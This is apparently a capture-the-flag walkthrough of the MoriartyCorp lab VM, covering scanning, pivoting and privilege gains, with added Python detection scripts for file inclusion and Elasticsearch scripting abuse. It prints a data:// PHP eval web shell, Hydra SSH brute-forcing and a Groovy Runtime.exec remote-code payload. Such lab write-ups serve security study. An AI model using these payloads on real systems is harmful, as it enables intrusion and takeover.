Lluna's Pure land.


MoriartyCorp

0x00. Official description

Hello Agent.

You’re here on a special mission.

A mission to take down one of the biggest weapons suppliers which is Moriarty Corp.

Enter flag{start} into the webapp to get started!

Notes:

  • Web panel is on port 8000 (not in scope. Don’t attack)
  • Flags are stored in #_flag.txt format. Flags are entered in flag{} format. They’re usually stored in / directory but can be in different locations.
  • To temporarily stop playing, pause the VM. Do not shut it down.
  • The webapp starts docker containers in the background when you add flags. Shutting down and rebooting will mess it up.

(the story is bad. sorry for the lack of creativity)

Difficulty: Med-Hard

Notes

Port 8000 is the flag submission port.

0x01. Host discovery

An ARP scan shows the target host is 192.168.56.102.

┌─[✗]─[user@parrot]─[~]
└──╼ $sudo arp-scan 192.168.56.0/24
[sudo] password for user:
Interface: eth0, type: EN10MB, MAC: 08:00:27:00:7c:8d, IPv4: 192.168.56.101
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:0e (Unknown: locally administered)
192.168.56.100 08:00:27:fd:f0:0e PCS Systemtechnik GmbH
192.168.56.102 08:00:27:81:9f:44 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.110 seconds (121.33 hosts/sec). 3 responded

0x02. Port scanning

Ports 22, 8000 and 9000 are open: 8000 is the flag submission port and 9000 is the Docker UI (Portainer).

┌─[user@parrot]─[~]
└──╼ $sudo nmap -A 192.168.56.102
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-19 06:06 BST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.102
Host is up (0.0038s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:a7:c8:64:2a:54:bc:64:48:16:2b:79:64:69:cc:45 (RSA)
| 256 89:8d:6a:9b:44:e3:f1:f1:ef:8c:23:13:7a:84:fc:71 (ECDSA)
|_ 256 1d:e6:68:27:52:5b:6d:0d:67:5d:30:4c:03:68:b3:2a (ED25519)
8000/tcp open http Werkzeug httpd 0.14.1 (Python 2.7.15rc1)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
9000/tcp open http Portainer Docker UI 1.19.2
|_http-title: Portainer
MAC Address: 08:00:27:81:9F:44 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 3.78 ms 192.168.56.102

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.55 seconds

0x03. Visiting port 8000

Submit flag{start} to begin the mission.

Following the hint, visit port 80.

Each time a flag is submitted, the port for the next level is opened, so rescan the host. Port 80 is now open.

┌─[user@parrot]─[~]
└──╼ $sudo nmap -p80 192.168.56.102
[sudo] password for user:
Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-19 06:22 BST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.56.102
Host is up (0.00049s latency).

PORT STATE SERVICE
80/tcp open http
MAC Address: 08:00:27:81:9F:44 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

0x04. Visiting port 80

The page takes ?file=page1.html, so test directly for file inclusion.

File inclusion is confirmed. Use the PHP data:// stream wrapper to include a one-line web shell.

0x05. Connecting with AntSword

data://text/plain,<?php eval($_POST['cmd']);?>
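From the defender's side, the inclusion above leaves a clear trace in the web server's access log: a file= parameter carrying a PHP stream wrapper or path traversal. The following script is an added example, not part of the original writeup, showing how to detect those indicators in combined-format access logs. The log lines are constructed here to resemble the requests the writeup describes (the benign page1.html request, a traversal attempt, and the data:// and php:// wrappers); the parameter name file= is the one the page shows.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (combined log format, not taken from the VM).
SAMPLE_LOG = """\
192.168.56.101 - - [19/Sep/2021:06:30:01 +0100] "GET /?file=page1.html HTTP/1.1" 200 512
192.168.56.101 - - [19/Sep/2021:06:30:05 +0100] "GET /?file=../../../../etc/passwd HTTP/1.1" 200 1731
192.168.56.101 - - [19/Sep/2021:06:30:09 +0100] "GET /?file=data://text/plain,%3C%3Fphp%20eval(%24_POST%5B'cmd'%5D)%3B%3F%3E HTTP/1.1" 200 89
192.168.56.101 - - [19/Sep/2021:06:30:12 +0100] "GET /?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 2048
192.168.56.101 - - [19/Sep/2021:06:30:15 +0100] "GET /?file=page2.html HTTP/1.1" 200 498
"""

# Pulls the request line ("GET /path?query HTTP/1.1") out of a combined-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Stream wrappers that have no business in a file-inclusion parameter.
WRAPPER_RE = re.compile(
    r'^(data|php|expect|phar|zip|file|ftp|http|https|glob)://', re.IGNORECASE)
TRAVERSAL_RE = re.compile(r'(\.\./|\.\.\\)')


def classify_value(value):
    """Return the indicator labels that apply to one parameter value."""
    # parse_qs already decoded once; decode again to catch double-encoded payloads.
    decoded = unquote(unquote(value))
    indicators = []
    if WRAPPER_RE.search(decoded):
        indicators.append("stream-wrapper")
    if TRAVERSAL_RE.search(decoded):
        indicators.append("path-traversal")
    if "\x00" in decoded or "%00" in value.lower():
        indicators.append("null-byte")
    return indicators


def scan_log(text, param="file"):
    """Return (line_number, raw_value, labels) for every suspicious value of `param`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("target")).query
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            labels = classify_value(value)
            if labels:
                findings.append((lineno, value, labels))
    return findings


if __name__ == "__main__":
    for lineno, value, labels in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: {', '.join(labels)} -> {value[:60]}")
```

Run against the constructed sample, the script flags lines 2 (traversal), 3 (data:// wrapper) and 4 (php://filter wrapper) and leaves the two ordinary page requests alone. On a real server the same check belongs in the application itself as an allowlist of permitted page names, so that wrapper and traversal values are rejected before include() ever sees them.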

0x06. Internal network penetration

According to the hint, there is a mission target host on the internal network.

The current target's internal IP is 172.17.0.3.

Use venom to set up a SOCKS proxy for pivoting into the internal network. First, upload the venom client.

The server listens on port 6666.

The client connects back and the proxy is established.

Add the proxy to the proxychains chain.

Internal host discovery: port 80 on 172.17.0.4 is open.

0x07. Visiting 172.17.0.4

Set the proxy and visit 172.17.0.4.

The page allows file uploads but requires a password, so brute-force it next (Burp Suite configured with the same proxy). The password is password.

0x08. Uploading the webshell

0x09. Connecting with Behinder

Got the flag.

0x10. Brute-forcing SSH

According to the hint, a username and a hash are given. Use Hydra to brute-force; first locate the target host.

Target host found: 172.17.0.6.

Brute-force: write the plaintext usernames and passwords to files (the hashes all correspond to weak passwords, which a quick online search reveals).

┌─[✗]─[user@parrot]─[~]
└──╼ $cat user
root
toor
admin
mcorp
moriarty
┌─[user@parrot]─[~]
└──╼ $cat pass
root
toor
password
admin
guest
MORIARTY
MCORP
mcorp
weapons
moriarty
┌─[user@parrot]─[~]
└──╼ $proxychains hydra -L user -P pass ssh://172.17.0.6

0x11. Logging in

proxychains ssh root@172.17.0.6

0x12. Continuing the internal network scan

Following the hint, continue scanning the internal network.

Port 8000 on 172.17.0.7 exposes a password change function. Capture the request and try changing the admin password; the change succeeds.

Log in as admin.

0x13. Scanning port 9200

According to the hint, there is an Elasticsearch server on the internal network; Elasticsearch listens on port 9200.

Scan for port 9200.

Visit port 9200 on 172.17.0.8.

0x14. Exploitation

Reference

{  "name": "kjsx"}
{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"ls\").getText()"}}}
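The request above works because the old Elasticsearch node accepts inline Groovy in script_fields and the script reaches java.lang.Runtime. A node that must stay on such a version should have dynamic scripting turned off in elasticsearch.yml (script.disable_dynamic: true on the 1.x line), and a reverse proxy or WAF in front of port 9200 can refuse search bodies that carry inline scripts at all. The following is an added example of that second control, not code from the writeup or from Elasticsearch: it walks a JSON search body, collects every inline script, and rejects bodies that either contain inline scripts when they are not permitted or reference JVM process and reflection APIs. The three request bodies are constructed for the example; the second mirrors the shape of the one shown on the page.

```python
import json

# Constructed request bodies (not captured from the VM).
BENIGN_BODY = '{"size": 1, "query": {"match_all": {}}}'
SCRIPT_BODY = ('{"size":1, "script_fields": {"lupin": {"lang": "groovy", '
               '"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\")'
               '.getRuntime().exec(\\"ls\\").getText()"}}}')
HARMLESS_SCRIPT_BODY = ('{"size":1, "script_fields": {"total": {"lang": "groovy", '
                        '"script": "doc[\'price\'].value * 2"}}}')

# Substrings that indicate a script is reaching for process execution or reflection
# rather than doing arithmetic on document fields.
SUSPICIOUS_TOKENS = ("java.lang.Runtime", "getRuntime", ".exec(", "forName(",
                     "ProcessBuilder", "java.io.File", "Class.forName")


def walk_scripts(node, path=""):
    """Yield (json_path, script_text) for every inline script string in the body."""
    if isinstance(node, dict):
        for key, value in node.items():
            child = f"{path}.{key}" if path else key
            # Both "script" and "inline" carry script source in Elasticsearch bodies.
            if key in ("script", "inline") and isinstance(value, str):
                yield child, value
            else:
                yield from walk_scripts(value, child)
    elif isinstance(node, list):
        for index, item in enumerate(node):
            yield from walk_scripts(item, f"{path}[{index}]")


def assess_body(raw, allow_inline_scripts=False):
    """Decide whether a search body may be forwarded to the Elasticsearch node.

    Returns a dict with the number of inline scripts, the scripts judged dangerous
    (JSON path plus the tokens that triggered), and the final allow/deny verdict.
    """
    body = json.loads(raw)
    scripts = list(walk_scripts(body))
    verdict = {"inline_scripts": len(scripts), "dangerous": [], "allowed": True}
    for path, text in scripts:
        hits = [token for token in SUSPICIOUS_TOKENS if token in text]
        if hits:
            verdict["dangerous"].append({"path": path, "tokens": hits})
    # Deny on any dangerous script, and on any inline script when the policy
    # is "no dynamic scripting" (the safe default for an exposed node).
    if verdict["dangerous"] or (scripts and not allow_inline_scripts):
        verdict["allowed"] = False
    return verdict


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY),
                        ("runtime-exec", SCRIPT_BODY),
                        ("arithmetic", HARMLESS_SCRIPT_BODY)):
        result = assess_body(body, allow_inline_scripts=True)
        print(f"{label:13} allowed={result['allowed']} dangerous={result['dangerous']}")
```

With inline scripts disallowed, only the plain match_all query passes; with them allowed, the arithmetic script passes while the Runtime.exec body is still denied, with the offending path (script_fields.lupin.script) and tokens recorded for the alert. The token list is a detection aid layered on top of disabling dynamic scripting, not a substitute for it.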
-------------The paper is short but the feeling runs long; see you next time-------------